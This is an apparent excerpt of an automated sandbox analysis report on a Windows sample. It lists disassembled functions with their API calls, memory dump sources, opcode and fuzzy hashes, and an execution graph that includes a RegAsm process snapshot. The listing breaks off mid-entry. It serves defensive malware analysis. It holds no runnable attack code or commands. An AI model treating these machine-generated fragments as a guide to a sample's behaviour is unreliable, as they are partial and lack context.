                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 3736152602-0
                                                                                      • Opcode ID: 8d091dd355546d2361852344f5621f29f4a4bfd11d0634cc6ce9332ebe6003f7
                                                                                      • Instruction ID: 9988ae041dfd8c8c7717ef5669350075f33a5f3ea01df919def351335c07755d
                                                                                      • Opcode Fuzzy Hash: 8d091dd355546d2361852344f5621f29f4a4bfd11d0634cc6ce9332ebe6003f7
                                                                                      • Instruction Fuzzy Hash: 10F0FE36A041167BDB2557A09C45BFA7795DB40364F0C4439EC06A3240DBB4FE41E690
                                                                                      Function 00FD8E7F Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00FD8ED3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                      • String ID: utf8
                                                                                      • API String ID: 3736152602-905460609
                                                                                      • Opcode ID: 8675c0e3dfcf5e423057b0e479ada135225aa581b703cc3e7cc08a5d9879c5fa
                                                                                      • Instruction ID: 8934ca0c1e16f8fb7cf8e5bd99cf946ad83e125c37ee67a83e2810d309aea8a3
                                                                                      • Opcode Fuzzy Hash: 8675c0e3dfcf5e423057b0e479ada135225aa581b703cc3e7cc08a5d9879c5fa
                                                                                      • Instruction Fuzzy Hash: E4F0A432610149ABC714AB64DC8AEFA73ACDF45314F15417EF506D7281DA78AD05A790
                                                                                      Function 00FD902A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • EnumSystemLocalesW.KERNEL32(00FD9308,00000001,?,?,?,?,00FD96AA,?,?,?,?), ref: 00FD9074
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: f272e9d860fd459b5a5655806097c49e38240b394962384eec4811c05bcc3b89
                                                                                      • Instruction ID: 63bae8791398e3a8bca01c01971c3f172f47776d588a1d2195c597fb641e93d0
                                                                                      • Opcode Fuzzy Hash: f272e9d860fd459b5a5655806097c49e38240b394962384eec4811c05bcc3b89
                                                                                      • Instruction Fuzzy Hash: 5CF0F6363043045FDB24AF75AC89A7A7B96EF81368B09442EFA468B780C6F69C01E750
                                                                                      Function 00FCA871 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • EnumSystemLocalesW.KERNEL32(00FCA85E,00000001,00FFA380,0000000C,00FCB19E,?,?,?,00000000), ref: 00FCA8A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2099609381-0
                                                                                      • Opcode ID: 6df33ba9b453e625b19dca04045d789f1f647999af5bdbc7d93ce1091790da32
                                                                                      • Instruction ID: c33fe9b05af0a5aae453868355a42a01bd7565080f43c21d301859001bb8520e
                                                                                      • Opcode Fuzzy Hash: 6df33ba9b453e625b19dca04045d789f1f647999af5bdbc7d93ce1091790da32
                                                                                      • Instruction Fuzzy Hash: FAF03772A40209EFD700EF98E942B9877F0FB44725F00411AF415DB2D1CBBA9900EF51
                                                                                      Function 00FD8F26 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00FCC3E7: GetLastError.KERNEL32(?,00000008,00FCA5D6), ref: 00FCC3EB
                                                                                        • Part of subcall function 00FCC3E7: SetLastError.KERNEL32(00000000), ref: 00FCC48D
                                                                                      • EnumSystemLocalesW.KERNEL32(00FD8E7F,00000001,?,?,?,00FD9708,?,?,?,?), ref: 00FD8F5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 53bffac545b53acb6ec3a7bc6905fcaf6b435cee85a0ee9aebdf129ee28c1c3b
                                                                                      • Instruction ID: 11645f3e62ae4153ffc7bc8edcd949a4e030ca3f943487ed181104cc803f5a22
                                                                                      • Opcode Fuzzy Hash: 53bffac545b53acb6ec3a7bc6905fcaf6b435cee85a0ee9aebdf129ee28c1c3b
                                                                                      • Instruction Fuzzy Hash: E0F0EC3570024557CB04AF35DC45A6ABF96EFC17A4B0A405DFA058F751C776D843D790
                                                                                      Function 00FCB32D Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?,?,?,00FC9AA2,?,20001004,00000000,00000002), ref: 00FCB361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID:
                                                                                      • API String ID: 2299586839-0
                                                                                      • Opcode ID: 2e0fbbec124b1e66188b962e8e489a421bb47cb73cc19503f436260a13d3d9f3
                                                                                      • Instruction ID: ad9d7cff4051c23f8ce95160236a5625fb5af7dbb326444f40308a2b3202db1e
                                                                                      • Opcode Fuzzy Hash: 2e0fbbec124b1e66188b962e8e489a421bb47cb73cc19503f436260a13d3d9f3
                                                                                      • Instruction Fuzzy Hash: 7FE09A3690015DBBCF122F60EC0AFEE3B2ABB40760F040018FD0565120CB768920BAA0
                                                                                      Function 00FD86EF Relevance: .3, Instructions: 327COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 3471368781-0
                                                                                      • Opcode ID: 51b36cf4f215ccec0dbda9f34d4dccae3ae36053e52d0890d8158a8b4e7a8ad0
                                                                                      • Instruction ID: 8a6263493453ba3e8fff28912e3603619fe0be3bbb109f1910dc0b9bbd66aa76
                                                                                      • Opcode Fuzzy Hash: 51b36cf4f215ccec0dbda9f34d4dccae3ae36053e52d0890d8158a8b4e7a8ad0
                                                                                      • Instruction Fuzzy Hash: F4B118359007059BCB389B24CC92BB7B3EAEF44758F58452EE983C6740EE75E942E711
                                                                                      Function 00FC612A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,29949A30,?,?,00000000,00FE7EF1,000000FF,?,00FC60B1,?,?,00FC6085,00FE7ED4), ref: 00FC615F
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FC6171
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,00FE7EF1,000000FF,?,00FC60B1,?,?,00FC6085,00FE7ED4), ref: 00FC6193
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 2f9f3d06b8ca36615c2d89680dc2d8cf9567bd33cd4a318ae67adadf185cfb4c
                                                                                      • Instruction ID: 6e9b72b20ec5303a3736c490ea690dc32b83499eda0f693e0228120dfb4366d4
                                                                                      • Opcode Fuzzy Hash: 2f9f3d06b8ca36615c2d89680dc2d8cf9567bd33cd4a318ae67adadf185cfb4c
                                                                                      • Instruction Fuzzy Hash: AD01A731948699AFCB118B51CC49FEE77B8FB04B25F040629F812E6690D7B59900DA90
                                                                                      Function 00F65030 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F6503C
                                                                                      • int.LIBCPMT ref: 00F6504F
                                                                                        • Part of subcall function 00F61C6B: std::_Lockit::_Lockit.LIBCPMT ref: 00F61C7C
                                                                                        • Part of subcall function 00F61C6B: std::_Lockit::~_Lockit.LIBCPMT ref: 00F61C96
                                                                                      • std::_Facet_Register.LIBCPMT ref: 00F65082
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F65098
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00F650A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                      • String ID:
                                                                                      • API String ID: 2081738530-0
                                                                                      • Opcode ID: 8b1053777a694989fba2715e35332ae161788cb0bbf8d6ff289a15d218d7b246
                                                                                      • Instruction ID: 53f827790e12ef62ccb336133bf1da47b34d8d1eca6656787a7de763ef32d3a8
                                                                                      • Opcode Fuzzy Hash: 8b1053777a694989fba2715e35332ae161788cb0bbf8d6ff289a15d218d7b246
                                                                                      • Instruction Fuzzy Hash: FE012B72900915BBCB15ABA4DC469DE776CEF81720F144149F801AB282EF75DE01A7D0
                                                                                      Function 00F61B73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F61B7A
                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F61BB2
                                                                                        • Part of subcall function 00F6B9E9: _Yarn.LIBCPMT ref: 00F6BA08
                                                                                        • Part of subcall function 00F6B9E9: _Yarn.LIBCPMT ref: 00F6BA2C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                      • String ID: bad locale name
                                                                                      • API String ID: 1908188788-1405518554
                                                                                      • Opcode ID: 762e735a2e8480c1dea7b728701da7e3ecbdb72144e3237229d879980592661f
                                                                                      • Instruction ID: 97ec0d1191baf5a5039838f97c75a039076e45e47f960135b766245325a790d7
                                                                                      • Opcode Fuzzy Hash: 762e735a2e8480c1dea7b728701da7e3ecbdb72144e3237229d879980592661f
                                                                                      • Instruction Fuzzy Hash: 58F01771509B409E83319F7A9881447FBE4BE283203948A2FE1DEC3A11D774E444DB6A
                                                                                      Function 00F61511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00F61516
                                                                                        • Part of subcall function 00F69E64: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00F69E70
                                                                                        • Part of subcall function 00F69E64: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00F69E90
                                                                                        • Part of subcall function 00F69E64: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00F69EB0
                                                                                        • Part of subcall function 00F69E64: std::regex_error::regex_error.LIBCPMT ref: 00F69ED0
                                                                                      • std::exception::exception.LIBCONCRT ref: 00F61523
                                                                                        • Part of subcall function 00F612A0: ___std_exception_copy.LIBVCRUNTIME ref: 00F612C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1675027103.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1675014046.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675074781.0000000000FE9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000000FFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001100000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675567478.00000000013F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675706373.00000000013F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1675736994.00000000013F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_f60000_kWYLtJ0Cn1.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: std::invalid_argument::invalid_argument$Xinvalid_argument___std_exception_copystd::_std::exception::exceptionstd::regex_error::regex_error
                                                                                      • String ID: string too long
                                                                                      • API String ID: 1410275967-2556327735
                                                                                      • Opcode ID: f7c3d894b8a7b054f521428ccf0896bfc59e3b3c1c93018d1038a1592819af29
                                                                                      • Instruction ID: 222551e671846f17b66d36ef7293dd5135a78a74f1233ac0c4911ce65fe2e244
                                                                                      • Opcode Fuzzy Hash: f7c3d894b8a7b054f521428ccf0896bfc59e3b3c1c93018d1038a1592819af29
                                                                                      • Instruction Fuzzy Hash: 5BC08C712083211383306A505C0188BBA44DF507A0701481ABA8482219DABA8880B2F1

                                                                                      Execution Graph

                                                                                      Execution Coverage:15.9%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:20%
                                                                                      Total number of Nodes:10
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 3692 1212e1b 3696 12132f0 3692->3696 3700 12132e7 3692->3700 3693 1212e21 3699 1213312 3696->3699 3697 1213383 LdrInitializeThunk 3698 12133a1 3697->3698 3698->3693 3699->3697 3703 12132f0 3700->3703 3701 1213383 LdrInitializeThunk 3702 12133a1 3701->3702 3702->3693 3703->3701

                                                                                      Executed Functions

                                                                                      Function 012132F0 Relevance: 1.7, APIs: 1, Instructions: 192libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 65 12132f0-1213310 66 1213312 65->66 67 1213317-121339f call 12135b1 call 121868c LdrInitializeThunk 65->67 66->67 71 12133a1 67->71 72 12133a6-12133ed 67->72 71->72 75 1213576-121357f 72->75 76 12133f2-12133fb 75->76 77 1213585-1213596 75->77 78 1213402-121342a 76->78 79 12133fd 76->79 82 1213431-1213454 78->82 83 121342c 78->83 79->78 85 1213456 82->85 86 121345b-1213472 82->86 83->82 85->86 88 1213480-1213486 86->88 89 1213474-121347e 86->89 90 1213489-1213496 88->90 89->90 91 1213498 90->91 92 121349d-12134aa 90->92 91->92 93 12134b1-1213573 92->93 94 12134ac 92->94 93->75 94->93
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.4120554570.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_1210000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8707ad2f6870b18a6453f33536626776a9238188b58d4ec997f3eb37e95761f4
                                                                                      • Instruction ID: ada15b8d6b851a24fa6079c9310c20cb5b0e331023cdeee8e09c9f8859efe8e4
                                                                                      • Opcode Fuzzy Hash: 8707ad2f6870b18a6453f33536626776a9238188b58d4ec997f3eb37e95761f4
                                                                                      • Instruction Fuzzy Hash: 4381A074E00219DFDB14DFAAD584A9DBBF2BF88310F14C069E918AB319DB30A885CF54
                                                                                      Function 012132E7 Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
